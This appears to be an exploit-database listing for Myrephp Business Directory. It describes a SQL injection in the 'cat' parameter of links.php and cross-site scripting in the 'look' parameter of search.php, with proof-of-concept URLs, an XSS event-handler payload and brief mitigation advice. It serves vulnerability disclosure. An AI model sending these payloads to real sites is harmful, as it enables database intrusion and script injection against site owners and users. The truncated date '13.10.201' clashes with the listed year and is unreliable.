header-logo
Suggest Exploit
vendor:
Myrephp Business Directory
by:
d3b4g
8,8
CVSS
HIGH
SQL Injection, Cross Site Scripting
89, 79
CWE
Product Name: Myrephp Business Directory
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2020

Myrephp Business Directory, Multiple Vulnerabilities

The vulnerability is present in the Myrephp Business Directory software. It allows an attacker to inject malicious SQL queries into the application by manipulating the 'cat' parameter of the 'links.php' page. It also allows an attacker to inject malicious JavaScript code into the application by manipulating the 'look' parameter of the 'search.php' page.

Mitigation:

The application should be configured to use parameterized queries and input validation should be implemented to prevent malicious code from being injected.
Source

Exploit-DB raw data:

# Exploit Title: Myrephp Business Directory,  Multiple Vulnerabilities
# Date: 13.10.201
# Exploit Author: d3b4g
# Vendor Homepage:http://myrephp.com
# Software Link: http://myrephp.com/biz/
# Tested on: Windows 7
# Blog: d3b4g.me



  
 
  ----------------------------------------------------------------------------------
  () SQL Injection :

   ---------------------------

  http://localhost/path/links.php?cat=1'[Insert Query]


  () Cross Site Scripting:-


   http:localhost/path/search.php?keywords1=&keywords2=&look=%27%20onmouseover%3dprompt%28945724%29%20bad%3d%27&nolinks1=10&order=city&page=2&sort=ASC

Navigation

Suggest Exploit

Services By CQR